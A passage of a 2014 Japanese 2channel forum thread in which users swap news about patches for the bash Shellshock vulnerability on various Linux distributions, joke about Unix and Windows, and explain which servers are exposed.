160 : かかと落とし(東京都)@転載は禁止:2014/09/27(土) 00:49:53.45 ID:jVW3Za5v0
AWKのAは宇宙船のウ

161 : ナガタロックII(広島県)@転載は禁止:2014/09/27(土) 01:03:07.88 ID:WK1OSlKE0
今日修正版のパッチがでたので、さっきまで対応して完了した。
うちは大丈夫だ!(と思う)

162 : ジャンピングDDT(catv?)@転載は禁止:2014/09/27(土) 01:28:52.16 ID:uQ0QnQLZ0
centos はパッチ出てますか?

163 : レインメーカー(兵庫県)@転載は禁止:2014/09/27(土) 01:44:31.63 ID:DRDw742L0
これはまた中々ひどいことになってるな

164 : リバースネックブリーカー(WiMAX)@転載は禁止:2014/09/27(土) 05:32:27.34 ID:eot9NtwX0
>>74
同級生?

165 : ファイナルカット(香川県)@転載は禁止:2014/09/27(土) 05:33:45.47 ID:epWJCKeN0
・・・混同か

166 : 32文ロケット砲(京都府)@転載は禁止:2014/09/27(土) 05:37:23.15 ID:kyLyHUWk0
昨日早速うちのサーバに攻撃がすっ飛んできててワロタ

167 : ファイナルカット(香川県)@転載は禁止:2014/09/27(土) 06:11:31.65 ID:epWJCKeN0
海の底にいったのかね

168 : ダブルニードロップ(アメリカ合衆国)@転載は禁止:2014/09/27(土) 07:46:36.89 ID:HRpnDeXK0
この脆弱性を悪用すると、初歩的な技術でもなんでもできるのが問題だろうな

169 : マスク剥ぎ(神奈川県)@転載は禁止:2014/09/27(土) 08:06:14.97 ID:nJ2i3YR/0
>>162
RedHat/CentOSは昨日の夕方の時点でパッチが出てた。
今日の時点までに大半が対応完了してるはず。

170 : フォーク攻撃(岐阜県)@転載は禁止:2014/09/27(土) 08:30:33.22 ID:E4eR9Px20
なんで今まで気づかなかったんだ?
bashなんて30年前からあるだろ

171 : スリーパーホールド(東京都)@転載は禁止:2014/09/27(土) 08:56:37.58 ID:NEh7HsGS0
>>155
HP-UXもsh=POSIXシェルで、bashは標準インストールされてないから、
大勝利だね

172 : サソリ固め(空)@転載は禁止:2014/09/27(土) 09:23:19.41 ID:ytqtFol80
(・Д・)おもった

ウイルス作るより、linux、Unixのセキュリティホール見つけてパッチを作るほうが売名できてね?

173 : サソリ固め(空)@転載は禁止:2014/09/27(土) 09:29:51.86 ID:ytqtFol80
(・Д・)さらにおもった

トロンでよくね?

174 : ファイヤーバードスプラッシュ(新疆ウイグル自治区)@転載は禁止:2014/09/27(土) 10:20:49.91 ID:FFNaSyum0
>>172
日本人限定でやるのは難しいだろうな

175 : キングコングニードロップ(愛知県)@転載は禁止:2014/09/27(土) 10:21:58.38 ID:m11L7her0
opensuseは大丈夫ですか?

176 : マスク剥ぎ(神奈川県)@転載は禁止:2014/09/27(土) 10:23:07.25 ID:nJ2i3YR/0
>>175
パッチが出てるよ。

177 : 毒霧(広島県)@転載は禁止:2014/09/27(土) 10:46:00.74 ID:QgsKyooP0
>>173
μI-TRONなら世間を席巻してたよ

178 : パイルドライバー(東京都)@転載は禁止:2014/09/27(土) 11:13:50.73 ID:8Va+3Wru0
>>164
elf社のアレかな。PC-98x1版の記憶しかないが。

179 : ハイキック(WiMAX)@転載は禁止:2014/09/27(土) 11:22:01.02 ID:RAjGEbXp0
ubuntu系も昨夜パッチ来てたな

180 : ミッドナイトエクスプレス(富山県)@転載は禁止:2014/09/27(土) 12:36:17.41 ID:psUhEqqc0
NHKで修正当てろとニュースでお知らせする時代

181 : ドラゴンスープレックス(家)@転載は禁止:2014/09/27(土) 17:30:35.86 ID:hCcwhcUP0
>>118
e?

182 : フロントネックロック(東京都)@転載は禁止:2014/09/27(土) 23:03:09.54 ID:2Ql4xq680
もうUnixが時代遅れってことだろう。
この世界は、十分に動きが速いから。
衰退も早いんだろう。

bashで脆弱性が見つかるなんて、もうダメでしょ。

183 : スターダストプレス(WiMAX)@転載は禁止:2014/09/27(土) 23:11:08.90 ID:cUfMfNGC0
またパッチが来てた
3回めかな?なんか落ち着かんのw

184 : フロントネックロック(東京都)@転載は禁止:2014/09/27(土) 23:12:03.46 ID:2Ql4xq680
やっぱりWindows最強説は正しかった…

185 : ナガタロックII(静岡県)@転載は禁止:2014/09/27(土) 23:32:07.52 ID:ePdUXLyU0
>>68
ネットとエロ動画と2ちゃんだよ

186 : エクスプロイダー(東日本)@転載は禁止:2014/09/27(土) 23:54:41.40 ID:BxfScyL40
うpでとしたらターミナルの文字が白一色になっちった(´・ω・`)
まぁいいけどさ

187 : エルボードロップ(兵庫県)@転載は禁止:2014/09/28(日) 00:01:03.77 ID:mLoPlo/u0
UNIX板のやつらなら

188 : キチンシンク(大阪府)@転載は禁止:2014/09/28(日) 00:10:15.45 ID:+3/OnrYE0
あー
会社と客のサーバそろそろやんねえとなあ
redhat4とか古いディストリはrpm探すか作るかしないとダメやん…

189 : ニーリフト(広島県)@転載は禁止:2014/09/28(日) 00:24:07.67 ID:DC8lBlVo0
良く分かっていないが、サーバ上でbashが実行できる環境が問題なのであって、
例えば、ユーザ認証をして特定のユーザだけログインできるようにしているwebやsshサーバは、
ログインされなけれは脅威は防げるってこと?

190 : ボマイェ(dion軍)@転載は禁止:2014/09/28(日) 02:42:20.97 ID:V3WiLE9KI
>>189
普通にPCとして使ってるなら関係ない。

Webサーバーとして使ってて、ただのスタティックコンテンツなホームページをネットに晒してるくらいなら、関係ない。

Webサーバーにcgiを晒してて、bashを呼ぶような作りになってるなら該当。

何言ってるか解らないなら、関係ない無い。

191 : リバースネックブリーカー(catv?)@転載は禁止:2014/09/28(日) 02:44:09.04 ID:znSQs7EL0
/bin/shが/bin/bashのリンクになってから、
/bin/shを/bin/zshにリンクしといた

192 : 河津落とし(東京都)@転載は禁止:2014/09/28(日) 02:55:10.57 ID:mYyv3jbo0
>>191
チャレンジャーだ
不具合起きなければいいな

今どきのLinuxディストリビューションにはbashを呼び出すプログラムが
結構あったりする
https://twitter.com/PowerDNS_Bert/status/515810987753340928
まずはbashを更新

193 : ランサルセ(東京都)@転載は禁止:2014/09/28(日) 12:57:43.24 ID:n0ZFZX/i0
LMDEが1台あるんだけどアプデかけても何も来てないよ

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50


read.cgi ver 05.05 2022/08/31 Walang Kapalit ★
FOX ★